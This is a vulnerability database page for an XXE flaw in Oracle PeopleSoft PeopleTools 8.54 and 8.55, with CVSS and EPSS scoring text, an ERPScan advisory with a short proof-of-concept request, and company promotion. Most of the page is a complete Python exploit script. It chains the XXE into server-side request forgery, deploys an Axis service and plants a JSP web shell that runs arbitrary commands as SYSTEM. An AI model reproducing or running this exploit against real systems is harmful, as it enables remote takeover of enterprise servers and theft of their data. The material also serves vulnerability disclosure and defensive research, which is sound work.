Related Weaknesses
CWE-ID |
Weakness Name |
Source |
CWE-611 |
Improper Restriction of XML External Entity Reference The product processes an XML document that can contain XML entities with URIs that resolve to documents outside of the intended sphere of control, causing the product to embed incorrect documents into its output. |
|
Metrics
Metrics |
Score |
Severity |
CVSS Vector |
Source |
V3.0 |
6.5 |
MEDIUM |
CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:L
Base: Exploitabilty MetricsThe Exploitability metrics reflect the characteristics of the thing that is vulnerable, which we refer to formally as the vulnerable component. Attack Vector This metric reflects the context by which vulnerability exploitation is possible. A vulnerability exploitable with network access means the vulnerable component is bound to the network stack and the attacker's path is through OSI layer 3 (the network layer). Such a vulnerability is often termed 'remotely exploitable' and can be thought of as an attack being exploitable one or more network hops away (e.g. across layer 3 boundaries from routers). Attack Complexity This metric describes the conditions beyond the attacker's control that must exist in order to exploit the vulnerability. Specialized access conditions or extenuating circumstances do not exist. An attacker can expect repeatable success against the vulnerable component. Privileges Required This metric describes the level of privileges an attacker must possess before successfully exploiting the vulnerability. The attacker is unauthorized prior to attack, and therefore does not require any access to settings or files to carry out an attack. User Interaction This metric captures the requirement for a user, other than the attacker, to participate in the successful compromise of the vulnerable component. The vulnerable system can be exploited without interaction from any user. Base: Scope MetricsAn important property captured by CVSS v3.0 is the ability for a vulnerability in one software component to impact resources beyond its means, or privileges. Scope Formally, Scope refers to the collection of privileges defined by a computing authority (e.g. an application, an operating system, or a sandbox environment) when granting access to computing resources (e.g. files, CPU, memory, etc). These privileges are assigned based on some method of identification and authorization. In some cases, the authorization may be simple or loosely controlled based upon predefined rules or standards. For example, in the case of Ethernet traffic sent to a network switch, the switch accepts traffic that arrives on its ports and is an authority that controls the traffic flow to other switch ports. An exploited vulnerability can only affect resources managed by the same authority. In this case the vulnerable component and the impacted component are the same. Base: Impact MetricsThe Impact metrics refer to the properties of the impacted component. Confidentiality Impact This metric measures the impact to the confidentiality of the information resources managed by a software component due to a successfully exploited vulnerability. There is some loss of confidentiality. Access to some restricted information is obtained, but the attacker does not have control over what information is obtained, or the amount or kind of loss is constrained. The information disclosure does not cause a direct, serious loss to the impacted component. Integrity Impact This metric measures the impact to integrity of a successfully exploited vulnerability. Integrity refers to the trustworthiness and veracity of information. There is no loss of integrity within the impacted component. Availability Impact This metric measures the impact to the availability of the impacted component resulting from a successfully exploited vulnerability. There is reduced performance or interruptions in resource availability. Even if repeated exploitation of the vulnerability is possible, the attacker does not have the ability to completely deny service to legitimate users. The resources in the impacted component are either partially available all of the time, or fully available only some of the time, but overall there is no direct, serious consequence to the impacted component. Temporal MetricsThe Temporal metrics measure the current state of exploit techniques or code availability, the existence of any patches or workarounds, or the confidence that one has in the description of a vulnerability. Environmental Metrics
|
nvd@nist.gov |
V2 |
6.4 |
|
AV:N/AC:L/Au:N/C:P/I:N/A:P |
nvd@nist.gov |
EPSS
EPSS is a scoring model that predicts the likelihood of a vulnerability being exploited.
EPSS Score
The EPSS model produces a probability score between 0 and 1 (0 and 100%). The higher the score, the greater the probability that a vulnerability will be exploited.
EPSS Percentile
The percentile is used to rank CVE according to their EPSS score. For example, a CVE in the 95th percentile according to its EPSS score is more likely to be exploited than 95% of other CVE. Thus, the percentile is used to compare the EPSS score of a CVE with that of other CVE.
Exploit information
Exploit Database EDB-ID : 43114
Publication date : 2017-05-16 22h00 +00:00
Author : Charles Fol
EDB Verified : No
#!/usr/bin/python3
# Oracle PeopleSoft SYSTEM RCE
# https://www.ambionics.io/blog/oracle-peoplesoft-xxe-to-rce
# cf
# 2017-05-17
import requests
import urllib.parse
import re
import string
import random
import sys
from requests.packages.urllib3.exceptions import InsecureRequestWarning
requests.packages.urllib3.disable_warnings(InsecureRequestWarning)
try:
import colorama
except ImportError:
colorama = None
else:
colorama.init()
COLORS = {
'+': colorama.Fore.GREEN,
'-': colorama.Fore.RED,
':': colorama.Fore.BLUE,
'!': colorama.Fore.YELLOW
}
URL = sys.argv[1].rstrip('/')
CLASS_NAME = 'org.apache.pluto.portalImpl.Deploy'
PROXY = 'localhost:8080'
# shell.jsp?c=whoami
PAYLOAD = '<%@ page import="java.util.*,java.io.*"%><% if (request.getParameter("c") != null) { Process p = Runtime.getRuntime().exec(request.getParameter("c")); DataInputStream dis
= new DataInputStream(p.getInputStream()); String disr = dis.readLine(); while ( disr != null ) { out.println(disr); disr = dis.readLine(); }; p.destroy(); }%>'
class Browser:
"""Wrapper around requests.
"""
def __init__(self, url):
self.url = url
self.init()
def init(self):
self.session = requests.Session()
self.session.proxies = {
'http': PROXY,
'https': PROXY
}
self.session.verify = False
def get(self, url ,*args, **kwargs):
return self.session.get(url=self.url + url, *args, **kwargs)
def post(self, url, *args, **kwargs):
return self.session.post(url=self.url + url, *args, **kwargs)
def matches(self, r, regex):
return re.findall(regex, r.text)
class Recon(Browser):
"""Grabs different informations about the target.
"""
def check_all(self):
self.site_id = None
self.local_port = None
self.check_version()
self.check_site_id()
self.check_local_infos()
def check_version(self):
"""Grabs PeopleTools' version.
"""
self.version = None
r = self.get('/PSEMHUB/hub')
m = self.matches(r, 'Registered Hosts Summary - ([0-9\.]+).</b>')
if m:
self.version = m[0]
o(':', 'PTools version: %s' % self.version)
else:
o('-', 'Unable to find version')
def check_site_id(self):
"""Grabs the site ID and the local port.
"""
if self.site_id:
return
r = self.get('/')
m = self.matches(r, '/([^/]+)/signon.html')
if not m:
raise RuntimeError('Unable to find site ID')
self.site_id = m[0]
o('+', 'Site ID: ' + self.site_id)
def check_local_infos(self):
"""Uses cookies to leak hostname and local port.
"""
if self.local_port:
return
r = self.get('/psp/%s/signon.html' % self.site_id)
for c, v in self.session.cookies.items():
if c.endswith('-PORTAL-PSJSESSIONID'):
self.local_host, self.local_port, *_ = c.split('-')
o('+', 'Target: %s:%s' % (self.local_host, self.local_port))
return
raise RuntimeError('Unable to get local hostname / port')
class AxisDeploy(Recon):
"""Uses the XXE to install Deploy, and uses its two useful methods to get
a shell.
"""
def init(self):
super().init()
self.service_name = 'YZWXOUuHhildsVmHwIKdZbDCNmRHznXR' #self.random_string(10)
def random_string(self, size):
return ''.join(random.choice(string.ascii_letters) for _ in range(size))
def url_service(self, payload):
return 'http://localhost:%s/pspc/services/AdminService?method=%s' % (
self.local_port,
urllib.parse.quote_plus(self.psoap(payload))
)
def war_path(self, name):
# This is just a guess from the few PeopleSoft instances we audited.
# It might be wrong.
suffix = '.war' if self.version and self.version >= '8.50' else ''
return './applications/peoplesoft/%s%s' % (name, suffix)
def pxml(self, payload):
"""Converts an XML payload into a one-liner.
"""
payload = payload.strip().replace('\n', ' ')
payload = re.sub('\s+<', '<', payload, flags=re.S)
payload = re.sub('\s+', ' ', payload, flags=re.S)
return payload
def psoap(self, payload):
"""Converts a SOAP payload into a one-liner, including the comment trick
to allow attributes.
"""
payload = self.pxml(payload)
payload = '!-->%s' % payload[:-1]
return payload
def soap_service_deploy(self):
"""SOAP payload to deploy the service.
"""
return """
<ns1:deployment xmlns="http://xml.apache.org/axis/wsdd/"
xmlns:java="http://xml.apache.org/axis/wsdd/providers/java"
xmlns:ns1="http://xml.apache.org/axis/wsdd/">
<ns1:service name="%s" provider="java:RPC">
<ns1:parameter name="className" value="%s"/>
<ns1:parameter name="allowedMethods" value="*"/>
</ns1:service>
</ns1:deployment>
""" % (self.service_name, CLASS_NAME)
def soap_service_undeploy(self):
"""SOAP payload to undeploy the service.
"""
return """
<ns1:undeployment xmlns="http://xml.apache.org/axis/wsdd/"
xmlns:ns1="http://xml.apache.org/axis/wsdd/">
<ns1:service name="%s"/>
</ns1:undeployment>
""" % (self.service_name, )
def xxe_ssrf(self, payload):
"""Runs the given AXIS deploy/undeploy payload through the XXE.
"""
data = """
<?xml version="1.0"?>
<!DOCTYPE IBRequest [
<!ENTITY x SYSTEM "%s">
]>
<IBRequest>
<ExternalOperationName>&x;</ExternalOperationName>
<OperationType/>
<From><RequestingNode/>
<Password/>
<OrigUser/>
<OrigNode/>
<OrigProcess/>
<OrigTimeStamp/>
</From>
<To>
<FinalDestination/>
<DestinationNode/>
<SubChannel/>
</To>
<ContentSections>
<ContentSection>
<NonRepudiation/>
<MessageVersion/>
<Data>
</Data>
</ContentSection>
</ContentSections>
</IBRequest>
""" % self.url_service(payload)
r = self.post(
'/PSIGW/HttpListeningConnector',
data=self.pxml(data),
headers={
'Content-Type': 'application/xml'
}
)
def service_check(self):
"""Verifies that the service is correctly installed.
"""
r = self.get('/pspc/services')
return self.service_name in r.text
def service_deploy(self):
self.xxe_ssrf(self.soap_service_deploy())
if not self.service_check():
raise RuntimeError('Unable to deploy service')
o('+', 'Service deployed')
def service_undeploy(self):
if not self.local_port:
return
self.xxe_ssrf(self.soap_service_undeploy())
if self.service_check():
o('-', 'Unable to undeploy service')
return
o('+', 'Service undeployed')
def service_send(self, data):
"""Send data to the Axis endpoint.
"""
return self.post(
'/pspc/services/%s' % self.service_name,
data=data,
headers={
'SOAPAction': 'useless',
'Content-Type': 'application/xml'
}
)
def service_copy(self, path0, path1):
"""Copies one file to another.
"""
data = """
<?xml version="1.0" encoding="utf-8"?>
<soapenv:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
xmlns:api="http://127.0.0.1/Integrics/Enswitch/API"
xmlns:xsd="http://www.w3.org/2001/XMLSchema"
xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/">
<soapenv:Body>
<api:copy
soapenv:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/">
<in0 xsi:type="xsd:string">%s</in0>
<in1 xsi:type="xsd:string">%s</in1>
</api:copy>
</soapenv:Body>
</soapenv:Envelope>
""".strip() % (path0, path1)
response = self.service_send(data)
return '<ns1:copyResponse' in response.text
def service_main(self, tmp_path, tmp_dir):
"""Writes the payload at the end of the .xml file.
"""
data = """
<?xml version="1.0" encoding="utf-8"?>
<soapenv:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
xmlns:api="http://127.0.0.1/Integrics/Enswitch/API"
xmlns:xsd="http://www.w3.org/2001/XMLSchema"
xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/">
<soapenv:Body>
<api:main
soapenv:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/">
<api:in0>
<item xsi:type="xsd:string">%s</item>
<item xsi:type="xsd:string">%s</item>
<item xsi:type="xsd:string">%s.war</item>
<item xsi:type="xsd:string">something</item>
<item xsi:type="xsd:string">-addToEntityReg</item>
<item xsi:type="xsd:string"><![CDATA[%s]]></item>
</api:in0>
</api:main>
</soapenv:Body>
</soapenv:Envelope>
""".strip() % (tmp_path, tmp_dir, tmp_dir, PAYLOAD)
response = self.service_send(data)
def build_shell(self):
"""Builds a SYSTEM shell.
"""
# On versions >= 8.50, using another extension than JSP got 70 bytes
# in return every time, for some reason.
# Using .jsp seems to trigger caching, thus the same pivot cannot be
# used to extract several files.
# Again, this is just from experience, nothing confirmed
pivot = '/%s.jsp' % self.random_string(20)
pivot_path = self.war_path('PSOL') + pivot
pivot_url = '/PSOL' + pivot
# 1: Copy portletentityregistry.xml to TMP
per = '/WEB-INF/data/portletentityregistry.xml'
per_path = self.war_path('pspc')
tmp_path = '../' * 20 + 'TEMP'
tmp_dir = self.random_string(20)
tmp_per = tmp_path + '/' + tmp_dir + per
if not self.service_copy(per_path + per, tmp_per):
raise RuntimeError('Unable to copy original XML file')
# 2: Add JSP payload
self.service_main(tmp_path, tmp_dir)
# 3: Copy XML to JSP in webroot
if not self.service_copy(tmp_per, pivot_path):
raise RuntimeError('Unable to copy modified XML file')
response = self.get(pivot_url)
if response.status_code != 200:
raise RuntimeError('Unable to access JSP shell')
o('+', 'Shell URL: ' + self.url + pivot_url)
class PeopleSoftRCE(AxisDeploy):
def __init__(self, url):
super().__init__(url)
def o(s, message):
if colorama:
c = COLORS[s]
s = colorama.Style.BRIGHT + COLORS[s] + '|' + colorama.Style.RESET_ALL
print('%s %s' % (s, message))
x = PeopleSoftRCE(URL)
try:
x.check_all()
x.service_deploy()
x.build_shell()
except RuntimeError as e:
o('-', e)
finally:
x.service_undeploy()
Exploit Database EDB-ID : 41925
Publication date : 2017-04-24 22h00 +00:00
Author : ERPScan
EDB Verified : No
Application: Oracle PeopleSoft
Versions Affected: PeopleSoft HCM 9.2 on PeopleTools 8.55
Vendor URL: http://oracle.com
Bug: XXE
Reported: 23.12.2016
Vendor response: 24.12.2016
Date of Public Advisory: 18.04.2017
Reference: Oracle CPU April 2017
Author: Nadya Krivdyuk (ERPScan)
Description
1. ADVISORY INFORMATION
Title:[ERPSCAN-17-020] XXE VIA DOCTYPE in PeopleSoft
PeopleSoftServiceListeningConnector
Advisory ID: [ERPSCAN-17-020]
Risk: high
CVE: CVE-2017-3548
Advisory URL: https://erpscan.com/advisories/erpscan-17-020-xxe-via-doctype-peoplesoft/
Date published: 18.04.2017
Vendors contacted: Oracle
2. VULNERABILITY INFORMATION
Class: XXE
Impact: File disclosure, network discovery
Remotely Exploitable: yes
Locally Exploitable: no
CVSS Information
CVSS Base Score v3: 8.0 / 10
CVSS Base Vector:
AV : Attack Vector (Related exploit range) Network (N)
AC : Attack Complexity (Required attack complexity) High (H)
PR : Privileges Required (Level of privileges needed to exploit) High (H)
UI : User Interaction (Required user participation) None (N)
S : Scope (Change in scope due to impact caused to components beyond
the vulnerable component) Changed (C)
C : Impact to Confidentiality High (H)
I : Impact to Integrity High (H)
A : Impact to Availability High (H)
3. VULNERABILITY DESCRIPTION
A malicious user can modify an XML-based request to include XML
content that is then parsed locally.
4. VULNERABLE PACKAGES
PeopleSoft HCM 9.2 on PeopleTools 8.55
5. SOLUTIONS AND WORKAROUNDS
To correct this vulnerability, implement Oracle CPU April 2017
6. AUTHOR
Nadya Krivdyuk
7. TECHNICAL DESCRIPTION
An attacker can use an XML external entity vulnerability to send
specially crafted unauthorized XML requests, which will be processed
by the XML parser. The attacker can use an XML external entity
vulnerability for getting unauthorised access to the OS file system.
PoC
POST /PSIGW/PeopleSoftServiceListeningConnector HTTP/1.1
Host: 172.16.2.91:8000
Content-type: text/xml
<!DOCTYPE a PUBLIC "-//B/A/EN" "C:\windows">
8. ABOUT ERPScan Research
ERPScan research team specializes in vulnerability research and
analysis of critical enterprise applications. It was acknowledged
multiple times by the largest software vendors like SAP, Oracle,
Microsoft, IBM, VMware, HP for discovering more than 400
vulnerabilities in their solutions (200 of them just in SAP!).
ERPScan researchers are proud of discovering new types of
vulnerabilities (TOP 10 Web Hacking Techniques 2012) and of the "The
Best Server-Side Bug" nomination at BlackHat 2013.
ERPScan experts participated as speakers, presenters, and trainers at
60+ prime international security conferences in 25+ countries across
the continents ( e.g. BlackHat, RSA, HITB) and conducted private
trainings for several Fortune 2000 companies.
ERPScan researchers carry out the EAS-SEC project that is focused on
enterprise application security awareness by issuing annual SAP
security researches.
ERPScan experts were interviewed in specialized info-sec resources and
featured in major media worldwide. Among them there are Reuters,
Yahoo, SC Magazine, The Register, CIO, PC World, DarkReading, Heise,
Chinabyte, etc.
Our team consists of highly-qualified researchers, specialized in
various fields of cybersecurity (from web application to ICS/SCADA
systems), gathering their experience to conduct the best SAP security
research.
9. ABOUT ERPScan
ERPScan is the most respected and credible Business Application
Cybersecurity provider. Founded in 2010, the company operates globally
and enables large Oil and Gas, Financial, Retail and other
organizations to secure their mission-critical processes. Named as an
‘Emerging Vendor’ in Security by CRN, listed among “TOP 100 SAP
Solution providers” and distinguished by 30+ other awards, ERPScan is
the leading SAP SE partner in discovering and resolving security
vulnerabilities. ERPScan consultants work with SAP SE in Walldorf to
assist in improving the security of their latest solutions.
ERPScan’s primary mission is to close the gap between technical and
business security, and provide solutions for CISO's to evaluate and
secure SAP and Oracle ERP systems and business-critical applications
from both cyberattacks and internal fraud. As a rule, our clients are
large enterprises, Fortune 2000 companies and MSPs, whose requirements
are to actively monitor and manage security of vast SAP and Oracle
landscapes on a global scale.
We ‘follow the sun’ and have two hubs, located in Palo Alto and
Amsterdam, to provide threat intelligence services, continuous support
and to operate local offices and partner network spanning 20+
countries around the globe.
Address USA: 228 Hamilton Avenue, Fl. 3, Palo Alto, CA. 94301
Phone: 650.798.5255
Twitter: @erpscan
Scoop-it: Business Application Security
Products Mentioned
Configuraton 0
Oracle>>Peoplesoft_enterprise_peopletools >> Version 8.54
Oracle>>Peoplesoft_enterprise_peopletools >> Version 8.55
References